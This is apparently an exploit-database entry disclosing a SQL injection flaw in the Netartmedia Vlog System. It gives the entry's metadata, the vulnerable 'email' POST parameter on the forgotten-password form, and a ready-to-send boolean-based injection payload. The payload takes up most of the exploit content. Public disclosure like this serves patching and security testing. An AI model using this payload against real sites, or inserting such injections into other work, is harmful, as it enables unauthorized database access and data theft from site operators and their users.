Netartmedia Vlog System - 'email' SQL Injection

Author: Ahmet Ümit BAYRAM
type: webapps
platform: php
port: 80.0
date_added: 2019-03-21 
date_updated: 2019-03-21 
verified: 0 
codes:  
tags: SQL Injection (SQLi)
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: Netartmedia Vlog System - 'email' SQL Injection
# Date: 20.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.netartmedia.net/vlogsystem/
# Demo Site: https://www.phpscriptdemos.com/vlogs/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A
----- PoC: SQLi -----
# Request: http://localhost/[PATH]/index.php
# Vulnerable Parameter: email (POST)
# Attack
Pattern: ProceedSend=1&email=-1'%20OR%203*2*1=6%20AND%20000371=000371%20--%20&mod=forgotten_password